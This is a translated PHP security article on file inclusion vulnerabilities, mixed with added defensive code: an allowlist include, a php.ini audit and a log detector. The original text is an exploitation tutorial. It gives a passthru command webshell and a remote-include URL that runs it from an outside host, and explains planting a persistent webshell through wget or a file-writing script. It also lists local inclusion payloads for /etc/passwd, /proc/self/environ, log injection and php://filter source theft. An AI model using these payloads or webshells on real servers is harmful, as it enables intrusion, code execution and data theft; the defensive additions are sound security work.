PHP file include vulnerability details (including the truncation method) - vulnerability warning - the black bar safety net

ID MYHACK58:62201338337
Type myhack58
Reporter 佚名
Modified 2013-04-17T00:00:00


One. What is a "remote file inclusion vulnerability"?

The answer is: the server uses one of PHP's include-type functions to include a file, and because the source of the included file is not strictly filtered, the application can be made to include any file at all, including a malicious one. An attacker can then construct that malicious file to achieve their own ends.

The functions involved: include(), require(), include_once() and require_once()

> include: includes and runs the specified file. If an error occurs while including the external file, the system issues a warning, but the rest of the PHP file continues to execute. require: the only difference from include is what happens on error: include continues running, require stops. include_once: works almost the same as include, but before importing it first checks whether the file has already been imported; if it has, it is not included again. require_once: differs from require in exactly the way include_once differs from include, so I will not repeat it.

php.ini configuration: allow_url_fopen=Off means remote files cannot be included. PHP 4 has both remote and local inclusion; PHP 5 has only local inclusion.

Two. Why include files at all?

Programmers do not like doing the same thing twice, and do not like writing the same code (some utility functions, say) several times over, so they put the shared code into a separate file such as share.php and include it from the other files. In PHP we use the functions listed above for this purpose. The workflow is: if I want to include share.php inside main.php, I write include("share.php"), and from then on I can use the functions in share.php. Hard-coding the name of the file to include like this naturally causes no problem, and no vulnerability appears. So where exactly is the problem?

Sometimes it is not possible to know in advance which file needs to be included. First look at the following index.php code:

> if ($_GET['page']) {
>     include $_GET['page'];
> } else {
>     include "home.php";
> }

A perfectly normal piece of PHP code. How does it work?

The above code is called with a URL such as index.php?page=main.php, or simply index.php with no page parameter.

Combined with the code above, a simple description of how it runs:

  1. Submitting this URL to index.php sets the value of $_GET['page'].
  2. The code checks whether $_GET['page'] is non-empty; if it is not empty (here it is main.php), that file is included with include.
  3. If $_GET['page'] is empty, the else branch runs and includes "home.php".
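The same dynamic-include logic written so that the request can choose a page but never a path, as an added example that is not code from the original article. The page names home and main and the pages/ directory are assumptions for the demonstration; the CLI branch builds a temporary directory so the script can be run stand-alone.

```php
<?php
// Added example (not from the original article): a hardened replacement for the
// "include $_GET['page']" pattern shown above. The page names and the "pages/"
// directory are assumptions chosen for the demonstration.

declare(strict_types=1);

// Allowlist: the request value is only ever used as a key into this map, so no
// request-controlled string reaches include() as a path.
const PAGE_MAP = [
    'home' => 'home.php',
    'main' => 'main.php',
];

const PAGE_DIR = __DIR__ . '/pages';

/**
 * Map a request parameter to the file that may be included, or null.
 * Unknown keys (including "../x", "/etc/passwd", "php://filter/..." and
 * "http://...") are rejected before any filesystem access happens.
 */
function resolvePage(?string $requested, string $pageDir = PAGE_DIR): ?string
{
    $key = ($requested === null || $requested === '') ? 'home' : $requested;
    if (!array_key_exists($key, PAGE_MAP)) {
        return null;
    }
    // Defence in depth: even for allowlisted names, verify that the resolved
    // path (after symlink and ".." normalisation) is still inside $pageDir.
    $real = realpath($pageDir . '/' . PAGE_MAP[$key]);
    $base = realpath($pageDir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

if (PHP_SAPI === 'cli') {
    // Constructed self-check: create the two allowlisted files in a temporary
    // directory and show which request values are accepted.
    $tmp = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
    mkdir($tmp);
    foreach (PAGE_MAP as $file) {
        file_put_contents("$tmp/$file", "<?php echo 'included $file';\n");
    }
    $samples = [
        '', 'home', 'main',                 // accepted
        '../index.php', '/etc/passwd',      // traversal and absolute path
        'php://filter/read=convert.base64-encode/resource=config',
        'http://www.xxx.cn/cmd.txt?cmd=ls', // remote include attempt
        "main\0.php",                       // null byte truncation attempt
    ];
    foreach ($samples as $s) {
        $r = resolvePage($s, $tmp);
        printf("%-60s => %s\n", json_encode($s), $r === null ? 'rejected' : 'include ' . basename($r));
    }
    array_map('unlink', glob("$tmp/*"));
    rmdir($tmp);
} else {
    // Web usage, mirroring the original index.php: allowlisted file or default
    // page; anything else gets a 404 instead of an include().
    $file = resolvePage($_GET['page'] ?? null);
    if ($file === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $file;
}
```

The design point is that an allowlist beats a blocklist here: filtering "../" or "http://" out of the value still leaves wrappers, null bytes and absolute paths to think about, whereas a map lookup rejects every value that is not one of the known keys, and the realpath() check only has to protect against misconfiguration of the allowlisted files themselves.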

Three. Why is there a vulnerability?

You might say: that's great, you can dynamically include files according to the URL, how convenient! How does that produce a vulnerability? The answer is: we are not well-behaved. We like doing what others do not; we will not follow the author's own links, and we may want to name the file to be included ourselves. For example, we simply request the following URL: http://<host>/m4r10/php/index.php?page=hello.php. Our index.php then naively follows the steps above: it takes page as hello.php and calls include(hello.php). Now the problem appears: because there is no hello.php file, the include raises a warning similar to the following:

> Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
> Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/wwwroot/php/index.php on line 3

Note that the first Warning above says the hello.php file we specified was not found at the path we designated; the second Warning follows from the first, because the file was not found the inclusion itself fails with a warning.

Four. How is it exploited?

From the above you can see where the problem lies. So how do we take advantage of such a vulnerability? There are actually many methods, but in essence they are much the same; I describe three of the more common ones here:

  1. Including and reading out other files on the target machine

From the foregoing we can see that, because the page parameter is taken without any filtering, we can specify any other sensitive file on the target host. The earlier warning, for instance, exposed the absolute path (/vhost/wwwroot/php/), so we can probe repeatedly to include other files. Specifying the URL /m4r10/php/index.php?page=./txt.txt reads out the txt.txt file in the current path; when ../ is not filtered, ../../ can be used to move between directories; and an absolute path can be given directly to read sensitive system files, for example /php/index.php?page=/etc/passwd. If the target host does not restrict access very strictly, or Apache runs with relatively high privileges, the contents of this file can be read out. Otherwise you get something like: open_basedir restriction in effect. That Warning is Apache's open_basedir restricting which directories may be accessed.

  2. Remote file inclusion to run a PHP trojan

If "allow_url_fopen" is enabled on the target host (it is enabled by default, and few people change it), we have much more room to work with: we can specify a URL on another host that contains PHP webshell code and have it run directly. For example, I first write a piece of PHP code that runs commands and save it as cmd.txt (the suffix is not important, as long as the content is in PHP format):

> <?php
> if (get_magic_quotes_gpc()) { $_REQUEST["cmd"] = stripslashes($_REQUEST["cmd"]); } // remove escape characters: strip the backslashes from the string
> ini_set("max_execution_time", 0); // set the execution time for this script; 0 means no limit
> echo "M4R10 start line"; // print the start marker
> passthru($_REQUEST["cmd"]); // run the command given in cmd
> echo "M4R10 end line"; // print the end marker
> ?>

The role of the file above is to accept the command specified by cmd and call the passthru function to execute it; the output is returned between the M4R10 start line and the M4R10 end line. Save this file on our own host; that server need not support PHP, as long as the file can be reached over HTTP. Then, on the vulnerable host, we construct a URL like the following to use it:
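The remote inclusion above depends on the php.ini directives this article names (allow_url_fopen here, open_basedir earlier, allow_url_include later). An added check, not from the original article, that reports which of those directives leave inclusion unrestricted; the "weak" and "hardened" configurations are constructed for the demonstration and the script also audits the process it runs in:

```php
<?php
// Added example (not from the original article): audit the php.ini directives the
// article relies on and report which ones leave remote or unrestricted inclusion
// possible. Run from the CLI to compare two constructed configurations with the
// settings of the running interpreter.

declare(strict_types=1);

/** Interpret the string forms php.ini accepts for boolean directives. */
function iniBool(?string $v): bool
{
    if ($v === null) {
        return false;
    }
    return in_array(strtolower(trim($v)), ['1', 'on', 'yes', 'true'], true);
}

/**
 * Return a list of findings for a settings map (directive => raw value as
 * ini_get() returns it). Pass liveIncludeSettings() for the current process,
 * or a constructed map as in the self-check below.
 */
function auditIncludeSettings(array $ini): array
{
    $findings = [];
    if (iniBool($ini['allow_url_include'] ?? null)) {
        $findings[] = 'allow_url_include=On: include()/require() accept http:// and ftp:// targets (remote file inclusion)';
    }
    if (iniBool($ini['allow_url_fopen'] ?? null)) {
        $findings[] = 'allow_url_fopen=On: fopen()/file_get_contents() can fetch remote URLs; set Off unless the application needs it';
    }
    if (trim((string)($ini['open_basedir'] ?? '')) === '') {
        $findings[] = 'open_basedir empty: a path-based include can reach any file the web server user can read (/etc/passwd, /proc/self/environ, log files)';
    }
    return $findings;
}

/** Read the three directives from the running interpreter. */
function liveIncludeSettings(): array
{
    $out = [];
    foreach (['allow_url_fopen', 'allow_url_include', 'open_basedir'] as $k) {
        $v = ini_get($k);
        $out[$k] = $v === false ? null : $v;
    }
    return $out;
}

if (PHP_SAPI === 'cli') {
    // Constructed configurations: the defaults the article describes versus a hardened set.
    $weak     = ['allow_url_fopen' => '1', 'allow_url_include' => '1', 'open_basedir' => ''];
    $hardened = ['allow_url_fopen' => '0', 'allow_url_include' => '0', 'open_basedir' => '/var/www/html:/tmp'];
    $configs  = ['weak' => $weak, 'hardened' => $hardened, 'this process' => liveIncludeSettings()];
    foreach ($configs as $label => $cfg) {
        $f = auditIncludeSettings($cfg);
        echo "[$label] ", count($f) === 0 ? "no findings\n" : "\n  - " . implode("\n  - ", $f) . "\n";
    }
}
```

The open_basedir value in the hardened set is a placeholder; it must list the document root and any directory the application legitimately reads, separated by the platform's path separator, and it is what turns an arbitrary-path include into the "open_basedir restriction in effect" warning mentioned earlier.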

> /index.php?page=http://www.xxx.cn/cmd.txt?cmd=ls

Whatever follows cmd= is the command you want to execute. Other commonly used *UNIX commands include, for example:

ll: list the directory and its files (equivalent to dir on Windows)
pwd: show the current absolute path
id, whoami: show the current user
wget: download the file at the specified URL

And so on; look the others up on BAIDU yourself, I will not list them all.

  3. Including a file-creating PHP script (commonly used)

Some people may feel that getting a real webshell onto the target machine is more reassuring: if one day the owner finds and fixes the inclusion bug, we can no longer remotely include that "dummy" webshell above, can we? This mentality is understandable, so let's continue. To get a real webshell, we again describe two common methods:

1) Use a command such as wget to download a webshell

This is relatively simple and also very commonly used. With the pseudo-webshell we obtained above we can execute commands, so we can also call wget, a very powerful system tool. You can google just how powerful it is; it has a pile of parameters, enough to make your head spin, but we don't need anything that complicated: we use -O (--output-document=FILE), which writes the downloaded document to the file FILE.

The premise is that, following the previous steps, you have placed the PHP webshell code somewhere that can be reached over HTTP or FTP, for example on your own server, with the webshell as the content of that file. Then, through the pseudo-webshell we obtained, we execute the following URL: /cmd.txt?cmd=wget -O m4r10.php

If the current directory is writable, you get a webshell called m4r10.php; if the current directory is not writable, you need to think of another approach.

2) Use file creation

With wget, as above, we may find that the current directory cannot be written to, or that the target host has disabled or never installed the command, so we need to work around it. We can combine this with the previous file inclusion vulnerability and include a PHP script that creates a file and writes to it, with the following content:

> <?php
> $f = file_get_contents(""); // open the file stream at the specified path
> $ff = fopen("./upload/m4r10.php", "a"); // find a writable directory and create the file there
> fwrite($ff, $f); // write the stream opened above into the created file
> fclose($ff); // close and save the file
> ?>

This writes the same PHP file we downloaded with wget above, but with an improved method: a PHP script does the work. Use cmd.php?cmd=ll as above to find a directory you can write to, here upload; the file is then created in that directory as ./upload/m4r10.php, and we have our webshell.

  4. Local file inclusion (common)

A typical vulnerable code pattern:

> <?php include($_GET['pages'] . '.php'); ?>

Black-box identification: judging purely from the URL, when keywords such as path, dir, file, pag, page, archive, p, eng, language, files and the like appear in the URL, there may be a file inclusion vulnerability.

Local inclusion exploitation is covered here first, ignoring the truncation problem; the truncation method follows later.

1. Include a jpg, txt, rar or similar file uploaded to the server; this is the ideal situation.

2. Include the system's various logs, such as the Apache logs, file system logs and so on. When Apache's log format is combined, the log is generally very large and basically cannot be included successfully. There is an automated attack program for log inclusion. The devils blog mentioned a problem with spaces; see "The evil space: a new breakthrough in PHP local file inclusion vulnerabilities". The space problem is actually solved by base64-encoding the one-line payload before writing it, after which it can be executed.

3. Include /proc/self/environ. This environment variable file contains the web access session information, including the user-agent parameter, and the user-agent can be modified on the client side. Reference: "Shell via LFI – proc/self/environ method".

4. Include files generated by the PHP program itself, such as caches and templates; the success rate is higher with open source programs.

5. Use local inclusion to read sensitive PHP files; this requires PHP 5 or above. If you see "config" in the source code, use the following: index.php?pages=php://filter/read=convert.base64-encode/resource=config. This applies particularly where the readfile() function is used, which does not execute the included file, so the source code can be read directly.

6. Use the phpinfo page to get a shell. In large organizations the chance that a phpinfo page exists somewhere in the web group is greater. PoC and demonstration reference: "Using phpinfo information for LFI on temporary files".

7. Use an inclusion error, or include a PHP file containing an uninitialized variable; as long as the variable is not initialized it may be attacked again. See specifically: "Caprice of the include() local file inclusion vulnerability".

8. Combined cross-site use: index.php?pages= xss=phpcode; consider the domain trust issue.

9. Include temporary upload files. This method is very troublesome. Reference: "Resolving the temporary file deletion problem for POST method uploads: slow connections". Note: the premise is file_uploads = On; PHP 5.3.1 added max_file_uploads to php.ini, with a default maximum of 20 uploads. Windows format: under Windows the name has at most 4 random characters ('a'-'z', 'A'-'Z', '0'-'9'), for example c:/windows/temp/php3e.tmp. Linux format: 6 random characters ('a'-'z', 'A'-'Z', '0'-'9'), for example /tmp/phpUs7MxA. For the slow-connection upload code, see "The big parade of GetShell methods for PHP LFI vulnerabilities".

10. When you cannot find a directory with write permission, inject into the log instead, and then look for a directory with write permission. Injecting into the log: Linux: index.php?pages=/var/log/apache/logs/error_log%00&x=/&y=uname; Windows: index.php?pages=..\apache\logs\error.log%00&x=.&y=dir. For details refer to "PHP local file inclusion (LFI) vulnerability exploitation".

11. Use PHP wrappers, for example php://input, php://filter, data:// and so on, to include files; this requires PHP 5.2.0 and allow_url_include on. (Note: allow_url_fopen and allow_url_include only protect against handles labelled as URLs. This affects http(s) and ftp(s) but does not affect the php:// and data:// URL forms.)

12. Use LFI to determine whether a directory exists and to list directories, for example index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00. In a TTY shell this can be determined completely, but over a URL it is sometimes not feasible: even if dossierexistant does not exist, the passwd content may still be echoed. "Directory listing with PHP file functions under FreeBSD" (... php-file-functions/) lists directories using a logical check: if the directory does not exist, header.php + "File not found" + footer.php is returned; if it exists, header.php + footer.php is returned. This logic matches programmers' habits. It was once used to find a log deep in a directory tree and get a shell.

13. Include a SESSION file. PHP saves sessions as sess_SESSIONID; the default locations are /tmp/ (PHP sessions), /var/lib/php/session/ (PHP sessions), /var/lib/php5/ (PHP sessions), c:/windows/temp/ (PHP sessions) and so on.

14. Include /proc/self/cmdline or /proc/self/fd/ to find log files whose owner is root; by default root can access them. Specific reference: "Local File Inclusion – The Tricks of the Trade". Others mention including /var/log/auth.log, but by default that file is mode 644.

15. Include the maillog, usually located at /var/log/maillog. This method is also of very little use. Specific reference: "local file inclusion tricks" (link could not be found).

16. Include a fixed file. Of very little use, listed only for completeness; usable in a man-in-the-middle attack, for example.
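From the defender's side, the sixteen items above reduce to a handful of parameter shapes that are easy to recognise in web server logs: directory traversal, null byte truncation, php:// and data:// wrappers, remote URLs, absolute paths into /etc, /proc/self, /var/log and the session directories, and PHP tags in the User-Agent (the /proc/self/environ trick). The following detection logic is an added example, not part of the original article; the access log lines it scans are constructed for the demonstration and mirror the URLs quoted in this article.

```php
<?php
// Added example (not from the original article): detection logic that scans
// combined-format access log lines for the file inclusion payload shapes this
// article lists. The sample log lines at the bottom are constructed.

declare(strict_types=1);

// label => PCRE pattern applied to each URL-decoded query parameter value.
const LFI_RULES = [
    'directory traversal'   => '~(?:\.\./|\.\.\\\\)~',
    'null byte truncation'  => '~\x00~',
    'php/data wrapper'      => '~^(?:php|data|expect|phar)://~i',
    'remote include'        => '~^(?:https?|ftps?)://~i',
    'sensitive unix path'   => '~^/(?:etc/|proc/self/|var/log/|tmp/|var/lib/php)~i',
    'windows system path'   => '~^[a-z]:[\\\\/](?:windows|apache)~i',
];

// A User-Agent carrying PHP tags is the /proc/self/environ technique (item 3).
const UA_RULE = '~<\?(?:php|=)~i';

/** Parse one combined-format line into the fields we need, or null if it does not match. */
function parseRequestLine(string $line): ?array
{
    $re = '~^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"~';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int)$m[5], 'ua' => $m[6]];
}

/** Return one hit per (parameter, rule) match in the request target's query string. */
function scanTarget(string $target): array
{
    $hits = [];
    $q = strpos($target, '?');
    if ($q === false) {
        return $hits;
    }
    // parse_str percent-decodes values, so %00 becomes a real NUL byte and
    // %2e%2e becomes "..", which is the form the rules expect.
    parse_str(substr($target, $q + 1), $params);
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue; // array-style parameters are out of scope here
        }
        foreach (LFI_RULES as $label => $re) {
            if (preg_match($re, $value) === 1) {
                $hits[] = ['param' => (string)$name, 'rule' => $label, 'value' => $value];
            }
        }
    }
    return $hits;
}

/** Scan log lines; returns one alert per hit, tagged with line number, client IP and status. */
function scanAccessLog(array $lines): array
{
    $alerts = [];
    foreach ($lines as $i => $line) {
        $req = parseRequestLine($line);
        if ($req === null) {
            continue;
        }
        $hits = scanTarget($req['target']);
        if (preg_match(UA_RULE, $req['ua']) === 1) {
            $hits[] = ['param' => 'User-Agent', 'rule' => 'php code in user-agent', 'value' => $req['ua']];
        }
        foreach ($hits as $hit) {
            $alerts[] = ['line' => $i + 1, 'ip' => $req['ip'], 'status' => $req['status']] + $hit;
        }
    }
    return $alerts;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample log: one benign request followed by the payload shapes from this article.
    $sample = [
        '10.0.0.5 - - [17/Apr/2013:10:00:01 +0000] "GET /index.php?page=main.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
        '10.0.0.9 - - [17/Apr/2013:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.29.0"',
        '10.0.0.9 - - [17/Apr/2013:10:00:03 +0000] "GET /index.php?page=http://www.xxx.cn/cmd.txt?cmd=ls HTTP/1.1" 200 96 "-" "curl/7.29.0"',
        '10.0.0.9 - - [17/Apr/2013:10:00:04 +0000] "GET /index.php?pages=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 4096 "-" "curl/7.29.0"',
        '10.0.0.9 - - [17/Apr/2013:10:00:05 +0000] "GET /index.php?pages=/var/log/apache/logs/error_log%00&x=/&y=uname HTTP/1.1" 500 0 "-" "curl/7.29.0"',
        '10.0.0.9 - - [17/Apr/2013:10:00:06 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 1200 "-" "<?php phpinfo(); ?>"',
    ];
    foreach (scanAccessLog($sample) as $a) {
        printf("line %d %s status=%d [%s] %s=%s\n", $a['line'], $a['ip'], $a['status'],
               $a['rule'], $a['param'], json_encode($a['value']));
    }
}
```

Run against the constructed sample, the benign first line produces nothing and the remaining five produce seven alerts (the error_log request trips both the null byte and the /var/log path rules; the environ request trips the path rule and the User-Agent rule). Only query parameters and the User-Agent are inspected; a real deployment would also decode the request path and POST bodies, and would treat a 200 status on a flagged request as the signal that the include actually succeeded.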
